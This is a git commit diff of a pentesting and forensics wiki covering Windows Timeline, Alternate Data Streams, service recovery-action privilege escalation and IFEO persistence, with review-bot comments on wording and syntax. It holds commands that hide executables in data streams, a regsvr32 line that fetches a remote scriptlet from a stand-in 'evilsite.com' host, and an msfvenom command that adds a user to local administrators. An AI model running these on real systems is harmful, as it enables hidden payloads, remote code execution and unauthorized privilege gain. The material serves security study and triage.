GitBook: [master] 4 pages modified
This commit is contained in:
parent
25cdb0009b
commit
bc38d77ece
@ -14,6 +14,10 @@ Timeline is a Windows characteristic that provides **chronological history** of
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`
This database can be open with a SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
### ADS/Alternate Data Streams
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** was **downloaded** \(from the intranet, Internet...\) and some software \(like browser\) usually put even **more** **information** like the **URL** from where the file was downloaded.
## **File Backups**
### Recycle Bin
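Review bot: the new ADS paragraph has two grammar slips that make it read oddly in a forensics reference: "indicating **how** was **downloaded**" should be "indicating how it was downloaded" (from the intranet, the Internet...), and "some software (like browser) usually put even more information" should be "some software (like browsers) usually puts even more information". Since the point of the paragraph is evidentiary, it would help to spell out in one sentence that the presence of the Zone.Identifier stream is what marks a file as downloaded and that the extra fields written by browsers, such as the source URL, are where the origin is recovered from. While this area is being touched, the unchanged context line "This database can be open with a SQLite tool" should read "opened".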
@ -495,9 +495,13 @@ esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
set-content - path {path to the file} - stream {name of the stream}
### Discover ADS contecnt
dir /R
streams.exe <c:\path\to\file> #Binary from sysinternals#
Get-Item -Path .\fie.txt -Stream *
gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
###Extract content from ADS###
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
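Review bot: the line "set-content - path {path to the file} - stream {name of the stream}" is not valid PowerShell as written; the parameter names must be attached to the dash, i.e. `Set-Content -Path {path to the file} -Stream {name of the stream}`, otherwise `-` and `path` are parsed as separate positional arguments and the command fails. Three more small defects in the same hunk: the heading "### Discover ADS contecnt" should be "content"; `Get-Item -Path .\fie.txt -Stream *` should be `.\file.txt`; and "###Extract content from ADS###" needs a space after the hashes and no trailing hashes, or GitBook will render it as literal text instead of a heading. It would also be worth one sentence tying the two halves together for the defender: the `dir /R` and `gci -recurse ... -stream *` sweeps in the discovery section are exactly how the streams created by the commands above (including the `fakefile.doc:reg32.bat` example) are found, so a reader doing triage knows which listing to run.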
@ -631,6 +631,10 @@ You can manually create a service binary with metasploit:
msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe
```
### Recovery Actions
It's possible to indicate Windows what it should do[ when executing a service this fails](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc753662%28v=ws.11%29?redirectedfrom=MSDN). If that setting is pointing a binary and this binary can be overwritten you may be able to escalate privileges.
## Applications
### Installed Applications
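Review bot: the Recovery Actions sentence is hard to parse and the link text is split mid-phrase: "It's possible to indicate Windows what it should do[ when executing a service this fails]" should read "It is possible to tell Windows what it should do [when a service fails](...)" with the whole phrase inside the link. The second sentence should state the condition precisely rather than leaving it at "may be able to escalate privileges": the risk exists when a service's failure action is configured to run a program and the file at that path is writable by a low-privileged user, so the text should say to enumerate services that have a failure action set and check write permissions on the referenced binary. Also "If that setting is pointing a binary" should be "points to a binary".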
@ -308,6 +308,13 @@ Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Classes\htmlfile\shell\open\comm
Get-ItemProperty -Path 'Registry::HKLM\SOFTWARE\Wow6432Node\Classes\htmlfile\shell\open\command' -Name ""
```
### Image File Execution Options
```text
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKLM\Software\Microsoft\Wow6432Node\Windows NT\CurrentVersion\Image File Execution Options
```
## SysInternals
Note that all the sites where you can find autoruns are **already searched by**[ **winpeas.exe**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe). However, for a **more comprehensive list of auto-executed** file you could use [autoruns ](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns)from systinternals:
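Review bot: the new Image File Execution Options section gives only the two registry paths and, unlike the neighbouring sections, no explanation of what to inspect under them or why an entry there matters for persistence, so a reader scanning the page cannot tell what a hit means; add a sentence naming which value under each image-name subkey controls what runs and why an attacker-controlled entry is significant, matching the level of detail of the `htmlfile\shell\open\command` section just above. The `text` fence matches the file's convention, which is fine. In the unchanged context below, "from systinternals" is a typo for "from sysinternals".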